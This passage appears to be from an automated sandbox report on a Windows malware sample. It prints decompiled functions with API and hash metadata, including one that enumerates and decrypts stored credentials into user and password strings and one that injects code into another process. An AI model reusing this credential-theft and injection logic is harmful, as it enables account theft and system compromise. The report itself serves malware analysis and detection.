                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction ID: a5b569f93a913c997ede62b459655b5d3c6f20ecc9ce9054b703515ecd65e6d0
                                    • Opcode Fuzzy Hash: 4a3879545c6f68b8761238015d078142ae55796dd998d212b916fac696537039
                                    • Instruction Fuzzy Hash: 12911134A001189BDB10EB65CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040930C, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 226encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E0040930C(void* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char* _v32;
				char _v36;
				char _v40;
				char _v114;
				void _v151;
				char _v156;
				intOrPtr _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				void* _t79;
				void* _t84;
				intOrPtr _t119;
				void* _t158;
				void* _t173;
				void* _t185;
				void* _t187;
				short* _t188;
				intOrPtr _t195;
				intOrPtr _t200;
				void* _t223;
				void* _t230;
				signed int _t231;
				void* _t233;
				intOrPtr* _t235;
				intOrPtr _t237;
				intOrPtr _t238;

				_t172 = __ebx;
				_t237 = _t238;
				_t173 = 0x1b;
				do {
					_push(0);
					_push(0);
					_t173 = _t173 - 1;
				} while (_t173 != 0);
				_push(_t173);
				_push(__ebx);
				_t233 = __eax;
				_push(_t237);
				_push(0x409651);
				_push( *[fs:eax]);
				 *[fs:eax] = _t238;
				E00401AC0(__eax);
				memcpy( &_v151, "abe2869f-9b47-4cd9-a358-c22904dba7f7", 9 << 2);
				asm("movsb");
				_t235 = _t233;
				_t230 = 0x25;
				_t79 =  &_v151;
				_t188 =  &_v114;
				do {
					 *_t188 = 0 << 2;
					_t188 = _t188 + 2;
					_t79 = _t79 + 1;
					_t230 = _t230 - 1;
				} while (_t230 != 0);
				_v32 =  &_v114;
				_v36 = 0x4a;
				_push( &_v8);
				_push( &_v12);
				_push(0);
				_push(0);
				L004086E8();
				_t84 = _v12 - 1;
				if(_t84 >= 0) {
					_v40 = _t84 + 1;
					_t231 = 0;
					do {
						_t119 =  *((intOrPtr*)(_v8 + _t231 * 4));
						_v16 =  *((intOrPtr*)(_t119 + 0x1c));
						_v20 =  *((intOrPtr*)(_t119 + 0x18));
						_push( &_v28);
						_push(0);
						_push(0);
						_push(0);
						_push( &_v36);
						_push(0);
						_push( &_v20);
						L004086F0();
						_push( *_t235);
						_push("Address: ");
						E00401CAC( &_v156,  *((intOrPtr*)( *((intOrPtr*)(_v8 + _t231 * 4)) + 8)));
						_push(_v156);
						_push(0x4096a4);
						E00401E10();
						E00401174(_v28);
						_t172 = _v24;
						E00401D9C( &_v168, "User: ",  *_t235);
						E00402254( &_v164, _v168);
						_push(_v164);
						_push( &_v172);
						E00402218( &_v176, _v24);
						_push(E00402398(0x4096bc, _v176) - 1);
						E00402218( &_v180, _v24);
						_pop(_t185);
						E0040234C(_v180, _t185, 0, 0);
						_push(_v172);
						_push(0x4096c4);
						E00402280();
						E00401D3C(_t235, _v160);
						E00401D9C( &_v192, "Password: ",  *_t235);
						E00402254( &_v188, _v192);
						_push(_v188);
						_push( &_v196);
						E00402218( &_v200, _v24);
						_push(E00402398(0x4096bc, _v200));
						E00402218( &_v204, _v24);
						_t158 = E00402274(_v204);
						_push(_t158 - _t219);
						E00402218( &_v208, _t172);
						_push(E00402398(0x4096bc, _v208) + 1);
						E00402218( &_v212, _t172);
						_pop(_t223);
						_pop(_t187);
						E0040234C(_v212, _t187, _t223, 0);
						_push(_v196);
						_push(0x4096c4);
						_push(0x4096e4);
						E00402280();
						E00401D3C(_t235, _v184);
						_t231 = _t231 + 1;
						_t58 =  &_v40;
						 *_t58 = _v40 - 1;
						_t245 =  *_t58;
					} while ( *_t58 != 0);
				}
				E0040592C("Address: ", _t172,  *_t235, 0, _t235, _t245,  &_v216);
				E00401B14(_t235, _v216);
				E0040592C("User: ", _t172,  *_t235, 0, _t235, _t245,  &_v220);
				E00401B14(_t235, _v220);
				E0040592C("Password: ", _t172,  *_t235, 0, _t235, _t245,  &_v224);
				E00401B14(_t235, _v224);
				_pop(_t195);
				 *[fs:eax] = _t195;
				_push(E00409658);
				E00401AE4( &_v224, 3);
				E00402120( &_v212, 5);
				E00401AC0( &_v192);
				E00402120( &_v188, 5);
				E00401AC0( &_v168);
				E00402120( &_v164, 2);
				E00401AC0( &_v156);
				_t200 =  *0x4086bc; // 0x4086c0
				return E00402FC8( &_v8, _t200);
			}

















































                                    0x0040930c
                                    0x0040930d
                                    0x0040930f
                                    0x00409314
                                    0x00409314
                                    0x00409316
                                    0x00409318
                                    0x00409318
                                    0x0040931b
                                    0x0040931c
                                    0x0040931f
                                    0x00409323
                                    0x00409324
                                    0x00409329
                                    0x0040932c
                                    0x00409331
                                    0x00409347
                                    0x00409349
                                    0x0040934a
                                    0x0040934b
                                    0x00409350
                                    0x00409356
                                    0x00409359
                                    0x00409360
                                    0x00409363
                                    0x00409366
                                    0x00409367
                                    0x00409367
                                    0x0040936d
                                    0x00409370
                                    0x0040937a
                                    0x0040937e
                                    0x0040937f
                                    0x00409381
                                    0x00409383
                                    0x0040938b
                                    0x0040938e
                                    0x00409395
                                    0x00409398
                                    0x0040939a
                                    0x0040939d
                                    0x004093a3
                                    0x004093a9
                                    0x004093af
                                    0x004093b0
                                    0x004093b2
                                    0x004093b4
                                    0x004093b9
                                    0x004093ba
                                    0x004093bf
                                    0x004093c0
                                    0x004093c5
                                    0x004093c7
                                    0x004093db
                                    0x004093e0
                                    0x004093e6
                                    0x004093f2
                                    0x004093fa
                                    0x004093ff
                                    0x0040940f
                                    0x00409420
                                    0x00409425
                                    0x00409431
                                    0x0040943a
                                    0x00409450
                                    0x00409459
                                    0x00409466
                                    0x00409467
                                    0x0040946c
                                    0x00409472
                                    0x00409482
                                    0x0040948f
                                    0x004094a1
                                    0x004094b2
                                    0x004094b7
                                    0x004094c3
                                    0x004094cc
                                    0x004094e1
                                    0x004094ea
                                    0x004094f5
                                    0x004094fd
                                    0x00409506
                                    0x0040951c
                                    0x00409525
                                    0x00409530
                                    0x00409531
                                    0x00409532
                                    0x00409537
                                    0x0040953d
                                    0x00409542
                                    0x00409552
                                    0x0040955f
                                    0x00409564
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x00409565
                                    0x0040939a
                                    0x0040957e
                                    0x0040958b
                                    0x004095a0
                                    0x004095ad
                                    0x004095c2
                                    0x004095cf
                                    0x004095d6
                                    0x004095d9
                                    0x004095dc
                                    0x004095ec
                                    0x004095fc
                                    0x00409607
                                    0x00409617
                                    0x00409622
                                    0x00409632
                                    0x0040963d
                                    0x00409645
                                    0x00409650

                                    APIs
                                    • CredEnumerateA.ADVAPI32(00000000,00000000,?,?,00000000,00409651,?,?,?,?,0000001A,00000000,00000000), ref: 00409383
                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000000,?), ref: 004093C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CredCryptDataEnumerateUnprotect
                                    • String ID: Address: $J$Password: $User: $abe2869f-9b47-4cd9-a358-c22904dba7f7
                                    • API String ID: 347848744-1664342708
                                    • Opcode ID: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction ID: f7aa1b8b451512ca1bfa8244105fd5df2e5d2c4bebb96dcb77b4513865450f7e
                                    • Opcode Fuzzy Hash: a598dedb873e850efc99fa9ce02c242345e1ad2a0e5d827fa5438b311f1ce501
                                    • Instruction Fuzzy Hash: 59912234A001189BDB10EB55CD41F9EB3B9EF88304F5085FBA508B72D6DB789E458F69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408AD5, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 147encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 57%
                                    			E00408AD5(signed int* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, signed int __esi, char _a1, signed int _a73) {
				long* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed char _t43;
				long* _t50;
				intOrPtr _t66;
				intOrPtr _t71;
				void* _t76;
				void* _t94;
				intOrPtr _t103;
				intOrPtr _t104;
				signed char _t112;
				void* _t113;
				signed int _t115;
				void* _t116;
				char* _t117;
				void* _t119;

				asm("adc [edx], eax");
				_t43 =  *__eax ^  *[cs:ecx];
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				 *__ecx =  *__ecx + __edx;
				 *_t43 =  *_t43 + _t43;
				 *_t43 =  *_t43 + _t43;
				asm("adc [eax], al");
				_t115 = __esi | _a73;
				_t117 =  &_a1;
				asm("aaa");
				_pop(_t111);
				asm("arpl [gs:edi+0x64], bp");
				_push(_t117);
				_push(_t117);
				_push(_t115);
				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v16 = 0;
				_t116 = __edx;
				_t112 = _t43;
				_push(_t119);
				_push(0x408c74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119 + 0xffffffd8;
				_t94 = 0;
				E00401AC0(__edx);
				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0x8004);
				_t50 = _v8;
				_push(_t50);
				L00408978();
				if(_t50 != 0) {
					_push(0);
					E00402218( &_v28, _t112);
					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
					_push(_t112);
					_t66 = _v12;
					_push(_t66);
					L00408980();
					if(_t66 != 0) {
						_v20 = 0x14;
						_push(0x14);
						E00402FBC();
						_push(0);
						_push( &_v20);
						_push(_v16);
						_push(2);
						_t71 = _v12;
						_push(_t71);
						L00408970();
						if(_t71 != 0) {
							_push(_v12);
							L00408988();
							CryptReleaseContext(_v8, 0);
							_t76 = _v20 - 1;
							if(_t76 >= 0) {
								_v24 = _t76 + 1;
								_t113 = 0;
								do {
									_t94 = _t94 +  *(_v16 + _t113);
									_v40 =  *(_v16 + _t113) & 0x000000ff;
									_v36 = 0;
									E004089C8(0x408c8c, _t94, 0,  &_v40, _t113, _t116,  &_v32);
									E00401D58(_t116, _v32);
									_t113 = _t113 + 1;
									_t30 =  &_v24;
									 *_t30 = _v24 - 1;
								} while ( *_t30 != 0);
							}
							_v40 = 0;
							_v36 = 0;
							E004089C8(0x408c8c, _t94, 0,  &_v40, _t112, _t116,  &_v44);
							E00401D58(_t116, _v44);
						}
					}
				}
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00408C7B);
				E00401AC0( &_v44);
				E00401AC0( &_v32);
				E00402108( &_v28);
				_t104 =  *0x408ad4; // 0x408ad8
				return E00402FC8( &_v16, _t104);
			}



























                                    0x00408ad8
                                    0x00408ada
                                    0x00408add
                                    0x00408adf
                                    0x00408ae1
                                    0x00408ae3
                                    0x00408ae5
                                    0x00408ae7
                                    0x00408ae9
                                    0x00408aec
                                    0x00408aef
                                    0x00408af0
                                    0x00408af1
                                    0x00408af2
                                    0x00408af7
                                    0x00408af8
                                    0x00408aff
                                    0x00408b03
                                    0x00408b06
                                    0x00408b09
                                    0x00408b0c
                                    0x00408b0f
                                    0x00408b11
                                    0x00408b15
                                    0x00408b16
                                    0x00408b1b
                                    0x00408b1e
                                    0x00408b21
                                    0x00408b25
                                    0x00408b36
                                    0x00408b3e
                                    0x00408b3f
                                    0x00408b41
                                    0x00408b43
                                    0x00408b48
                                    0x00408b4b
                                    0x00408b4c
                                    0x00408b53
                                    0x00408b59
                                    0x00408b60
                                    0x00408b70
                                    0x00408b71
                                    0x00408b72
                                    0x00408b75
                                    0x00408b76
                                    0x00408b7d
                                    0x00408b83
                                    0x00408b8a
                                    0x00408b9a
                                    0x00408ba2
                                    0x00408ba7
                                    0x00408bab
                                    0x00408bac
                                    0x00408bae
                                    0x00408bb1
                                    0x00408bb2
                                    0x00408bb9
                                    0x00408bc2
                                    0x00408bc3
                                    0x00408bce
                                    0x00408bd6
                                    0x00408bd9
                                    0x00408bdc
                                    0x00408bdf
                                    0x00408be1
                                    0x00408be4
                                    0x00408bf2
                                    0x00408bf5
                                    0x00408c03
                                    0x00408c0d
                                    0x00408c12
                                    0x00408c13
                                    0x00408c13
                                    0x00408c13
                                    0x00408be1
                                    0x00408c20
                                    0x00408c23
                                    0x00408c31
                                    0x00408c3b
                                    0x00408c3b
                                    0x00408bb9
                                    0x00408b7d
                                    0x00408c42
                                    0x00408c45
                                    0x00408c48
                                    0x00408c50
                                    0x00408c58
                                    0x00408c60
                                    0x00408c68
                                    0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction ID: d3845163c2b931c13764af6d44d3521470b732fafe65dfe0c77c1fbeb44f725f
                                    • Opcode Fuzzy Hash: c67aecaa6e23e9d039a3e904eadb6ac2ef83ae983283d730df33f5abd18faf33
                                    • Instruction Fuzzy Hash: 04513070A04249AFDB01EBA5C941BEEBBB8AF09304F5540BFF540F72D1DA7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00408AF8, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132encryptionCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 61%
                                    			E00408AF8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				long* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				char _v44;
				long* _t47;
				intOrPtr _t63;
				intOrPtr _t68;
				void* _t73;
				void* _t91;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t114;

				_v44 = 0;
				_v32 = 0;
				_v28 = 0;
				_v16 = 0;
				_t111 = __edx;
				_t108 = __eax;
				_push(_t114);
				_push(0x408c74);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114 + 0xffffffd8;
				_t91 = 0;
				E00401AC0(__edx);
				CryptAcquireContextA( &_v8, 0, 0, 1, 0);
				_push( &_v12);
				_push(0);
				_push(0);
				_push(0x8004);
				_t47 = _v8;
				_push(_t47);
				L00408978();
				if(_t47 != 0) {
					_push(0);
					E00402218( &_v28, _t108);
					_push(E00402274(_v28) + 1 + E00402274(_v28) + 1);
					_push(_t108);
					_t63 = _v12;
					_push(_t63);
					L00408980();
					if(_t63 != 0) {
						_v20 = 0x14;
						_push(0x14);
						E00402FBC();
						_push(0);
						_push( &_v20);
						_push(_v16);
						_push(2);
						_t68 = _v12;
						_push(_t68);
						L00408970();
						if(_t68 != 0) {
							_push(_v12);
							L00408988();
							CryptReleaseContext(_v8, 0);
							_t73 = _v20 - 1;
							if(_t73 >= 0) {
								_v24 = _t73 + 1;
								_t109 = 0;
								do {
									_t91 = _t91 +  *(_v16 + _t109);
									_v40 =  *(_v16 + _t109) & 0x000000ff;
									_v36 = 0;
									E004089C8(0x408c8c, _t91, 0,  &_v40, _t109, _t111,  &_v32);
									E00401D58(_t111, _v32);
									_t109 = _t109 + 1;
									_t29 =  &_v24;
									 *_t29 = _v24 - 1;
								} while ( *_t29 != 0);
							}
							_v40 = 0;
							_v36 = 0;
							E004089C8(0x408c8c, _t91, 0,  &_v40, _t108, _t111,  &_v44);
							E00401D58(_t111, _v44);
						}
					}
				}
				_pop(_t99);
				 *[fs:eax] = _t99;
				_push(E00408C7B);
				E00401AC0( &_v44);
				E00401AC0( &_v32);
				E00402108( &_v28);
				_t100 =  *0x408ad4; // 0x408ad8
				return E00402FC8( &_v16, _t100);
			}
























                                    0x00408b03
                                    0x00408b06
                                    0x00408b09
                                    0x00408b0c
                                    0x00408b0f
                                    0x00408b11
                                    0x00408b15
                                    0x00408b16
                                    0x00408b1b
                                    0x00408b1e
                                    0x00408b21
                                    0x00408b25
                                    0x00408b36
                                    0x00408b3e
                                    0x00408b3f
                                    0x00408b41
                                    0x00408b43
                                    0x00408b48
                                    0x00408b4b
                                    0x00408b4c
                                    0x00408b53
                                    0x00408b59
                                    0x00408b60
                                    0x00408b70
                                    0x00408b71
                                    0x00408b72
                                    0x00408b75
                                    0x00408b76
                                    0x00408b7d
                                    0x00408b83
                                    0x00408b8a
                                    0x00408b9a
                                    0x00408ba2
                                    0x00408ba7
                                    0x00408bab
                                    0x00408bac
                                    0x00408bae
                                    0x00408bb1
                                    0x00408bb2
                                    0x00408bb9
                                    0x00408bc2
                                    0x00408bc3
                                    0x00408bce
                                    0x00408bd6
                                    0x00408bd9
                                    0x00408bdc
                                    0x00408bdf
                                    0x00408be1
                                    0x00408be4
                                    0x00408bf2
                                    0x00408bf5
                                    0x00408c03
                                    0x00408c0d
                                    0x00408c12
                                    0x00408c13
                                    0x00408c13
                                    0x00408c13
                                    0x00408be1
                                    0x00408c20
                                    0x00408c23
                                    0x00408c31
                                    0x00408c3b
                                    0x00408c3b
                                    0x00408bb9
                                    0x00408b7d
                                    0x00408c42
                                    0x00408c45
                                    0x00408c48
                                    0x00408c50
                                    0x00408c58
                                    0x00408c60
                                    0x00408c68
                                    0x00408c73

                                    APIs
                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B36
                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B4C
                                    • CryptHashData.ADVAPI32(?,?,00000001,00000000,?,00008004,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,00408C74), ref: 00408B76
                                    • CryptGetHashParam.ADVAPI32(?,00000002,?,00000014,00000000), ref: 00408BB2
                                    • CryptDestroyHash.ADVAPI32(?,?,00000002,?,00000014,00000000), ref: 00408BC3
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000002,?,00000014,00000000), ref: 00408BCE
                                      • Part of subcall function 004089C8: wvsprintfA.USER32(?,00000000,?), ref: 00408A5E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleasewvsprintf
                                    • String ID: %2.2X
                                    • API String ID: 1237987328-791839006
                                    • Opcode ID: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction ID: 55925fcc99f9e55126638c730d6fbe2105b7814248b5782dab5394ac9007a686
                                    • Opcode Fuzzy Hash: e851e4a92d8badf89d07f2a4177f5b83356ef3185ba0f28d6caae7e2681b3e9d
                                    • Instruction Fuzzy Hash: EE412470A442099BDB00EBA5C942BEEB7F8EF48704F54407EF540F72D1DB7899058B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AF08, Relevance: 10.6, APIs: 7, Instructions: 70injectionmemorythreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 76%
                                    			E0040AF08(void* __eax, void* __ecx, _Unknown_base(*)()* __edx) {
				long _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				_Unknown_base(*)()* _v36;
				void* _t18;
				void* _t30;
				struct HINSTANCE__* _t32;
				void* _t35;
				long _t36;
				void* _t37;

				_v32 = __ecx;
				_v36 = __edx;
				_t30 = __eax;
				_v28 = 0;
				_t32 = GetModuleHandleA(0);
				_push(0);
				_push(_t32);
				asm("cdq");
				_t18 =  *((intOrPtr*)(_t32 + 0x3c)) + _v20;
				asm("adc edx, [esp+0x4]");
				_t36 =  *(_t18 + 0x50);
				_t35 =  *(_t18 + 0x34);
				VirtualFreeEx(_t30, _t35, 0, 0x8000);
				_t37 = VirtualAllocEx(_t30, _t35, _t36, 0x3000, 0x40);
				if(_t37 != 0) {
					WriteProcessMemory(_t30, _t35, GetModuleHandleA(0), _t36,  &_v24);
					if(_t36 <= _v24) {
						CreateRemoteThread(_t30, 0, 0, _v36, _v32, 0,  &_v20);
						CloseHandle(_t30);
						_v32 = _t37;
					}
				}
				return _v28;
			}














                                    0x0040af0f
                                    0x0040af13
                                    0x0040af16
                                    0x0040af1a
                                    0x0040af25
                                    0x0040af2b
                                    0x0040af2c
                                    0x0040af30
                                    0x0040af31
                                    0x0040af34
                                    0x0040af3b
                                    0x0040af3e
                                    0x0040af4a
                                    0x0040af5e
                                    0x0040af62
                                    0x0040af74
                                    0x0040af7d
                                    0x0040af95
                                    0x0040af9b
                                    0x0040afa0
                                    0x0040afa0
                                    0x0040af7d
                                    0x0040afaf

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                    • VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                    • VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                    • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                    • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$ModuleVirtual$AllocCloseCreateFreeMemoryProcessRemoteThreadWrite
                                    • String ID:
                                    • API String ID: 2398686212-0
                                    • Opcode ID: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction ID: ba714f15e26322d81a3db079e442bf4d00767b5fd8d80c8da630a050ea91888e
                                    • Opcode Fuzzy Hash: 94c8698d38da8039340599384be28bab159c0d8f4d27272cb75147a051b3407f
                                    • Instruction Fuzzy Hash: D71142B12443007FD210EE698C46F2BBBDCDFC5715F44882EB658E72D1D674E904876A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404E10, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00404E10() {

				if( *0x40e944 == 0) {
					 *0x40e944 = GetModuleHandleA("kernel32.dll");
					if( *0x40e944 != 0) {
						 *0x40e948 = GetProcAddress( *0x40e944, "CreateToolhelp32Snapshot");
						 *0x40e94c = GetProcAddress( *0x40e944, "Heap32ListFirst");
						 *0x40e950 = GetProcAddress( *0x40e944, "Heap32ListNext");
						 *0x40e954 = GetProcAddress( *0x40e944, "Heap32First");
						 *0x40e958 = GetProcAddress( *0x40e944, "Heap32Next");
						 *0x40e95c = GetProcAddress( *0x40e944, "Toolhelp32ReadProcessMemory");
						 *0x40e960 = GetProcAddress( *0x40e944, "Process32First");
						 *0x40e964 = GetProcAddress( *0x40e944, "Process32Next");
						 *0x40e968 = GetProcAddress( *0x40e944, "Process32FirstW");
						 *0x40e96c = GetProcAddress( *0x40e944, "Process32NextW");
						 *0x40e970 = GetProcAddress( *0x40e944, "Thread32First");
						 *0x40e974 = GetProcAddress( *0x40e944, "Thread32Next");
						 *0x40e978 = GetProcAddress( *0x40e944, "Module32First");
						 *0x40e97c = GetProcAddress( *0x40e944, "Module32Next");
						 *0x40e980 = GetProcAddress( *0x40e944, "Module32FirstW");
						 *0x40e984 = GetProcAddress( *0x40e944, "Module32NextW");
					}
				}
				if( *0x40e944 == 0 ||  *0x40e948 == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                    0x00404e19
                                    0x00404e29
                                    0x00404e2e
                                    0x00404e41
                                    0x00404e53
                                    0x00404e65
                                    0x00404e77
                                    0x00404e89
                                    0x00404e9b
                                    0x00404ead
                                    0x00404ebf
                                    0x00404ed1
                                    0x00404ee3
                                    0x00404ef5
                                    0x00404f07
                                    0x00404f19
                                    0x00404f2b
                                    0x00404f3d
                                    0x00404f4f
                                    0x00404f4f
                                    0x00404e2e
                                    0x00404f57
                                    0x00404f65
                                    0x00404f66
                                    0x00404f69
                                    0x00404f69

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00405097,?,00000000,0040520D,00000000,004052C4), ref: 00404E24
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00404E3C
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 00404E4E
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 00404E60
                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00404E72
                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00404E84
                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 00404E96
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00404EA8
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00404EBA
                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00404ECC
                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00404EDE
